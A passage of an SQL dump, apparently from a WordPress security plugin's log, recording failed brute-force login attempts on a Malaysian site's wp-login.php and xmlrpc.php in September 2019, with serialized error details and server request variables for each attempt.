empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"48604\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGId24SfF9g@8lNlxwoigAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568770167.3579\";s:12:\"REQUEST_TIME\";s:10:\"1568770167\";}}','notice','2019-09-18 01:29:28','2019-09-18 01:29:27',17737856,19227944,'https://bintara.com.my/wp-login.php',1,0,'80.82.122.216'),(24831,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.12.2\";s:11:\"REMOTE_PORT\";s:5:\"42614\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGHFCqbKGlf1IVly7OGZAAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769812.5252\";s:12:\"REQUEST_TIME\";s:10:\"1568769812\";}}','notice','2019-09-18 01:23:34','2019-09-18 01:23:33',18257152,19556248,'https://bintara.com.my/xmlrpc.php',1,0,'5.196.12.2'),(24830,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.12.2\";s:11:\"REMOTE_PORT\";s:5:\"41612\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGHEI75s89pqgR69SL3gQAAAZM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769808.9331\";s:12:\"REQUEST_TIME\";s:10:\"1568769808\";}}','notice','2019-09-18 01:23:30','2019-09-18 01:23:29',17740592,19230368,'https://bintara.com.my/wp-login.php',1,0,'5.196.12.2'),(24829,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"169.61.210.246\";s:11:\"REMOTE_PORT\";s:5:\"57004\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGFa475s89pqgR69SL1oAAAAYE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769387.4636\";s:12:\"REQUEST_TIME\";s:10:\"1568769387\";}}','notice','2019-09-18 01:16:29','2019-09-18 01:16:27',18259456,19555528,'https://bintara.com.my/xmlrpc.php',1,0,'169.61.210.246'),(24828,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"169.61.210.246\";s:11:\"REMOTE_PORT\";s:5:\"25735\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGFZ475s89pqgR69SL1nAAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769384.1541\";s:12:\"REQUEST_TIME\";s:10:\"1568769384\";}}','notice','2019-09-18 01:16:25','2019-09-18 01:16:24',17741176,19232480,'https://bintara.com.my/wp-login.php',1,0,'169.61.210.246'),(24827,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"42585\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGFVY75s89pqgR69SL1kwAAAZY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769365.9034\";s:12:\"REQUEST_TIME\";s:10:\"1568769365\";}}','notice','2019-09-18 01:16:07','2019-09-18 01:16:06',18259888,19555304,'https://bintara.com.my/xmlrpc.php',1,0,'37.187.75.56'),(24826,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.75.56\";s:11:\"REMOTE_PORT\";s:5:\"42311\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGFUiqbKGlf1IVly7OFvQAAAUk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769362.8744\";s:12:\"REQUEST_TIME\";s:10:\"1568769362\";}}','notice','2019-09-18 01:16:04','2019-09-18 01:16:03',17741384,19233032,'https://bintara.com.my/wp-login.php',1,0,'37.187.75.56'),(24825,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"198.12.156.214\";s:11:\"REMOTE_PORT\";s:5:\"45612\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGEKCqbKGlf1IVly7OFXAAAAUk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769065.5667\";s:12:\"REQUEST_TIME\";s:10:\"1568769065\";}}','notice','2019-09-18 01:11:08','2019-09-18 01:11:06',18259456,19555528,'https://bintara.com.my/xmlrpc.php',1,0,'198.12.156.214'),(24824,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"198.12.156.214\";s:11:\"REMOTE_PORT\";s:5:\"44158\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGEIEQGijxhVPhG1M0GBgAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568769056.6711\";s:12:\"REQUEST_TIME\";s:10:\"1568769056\";}}','notice','2019-09-18 01:10:58','2019-09-18 01:10:57',17741976,19232880,'https://bintara.com.my/wp-login.php',1,0,'198.12.156.214'),(24823,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 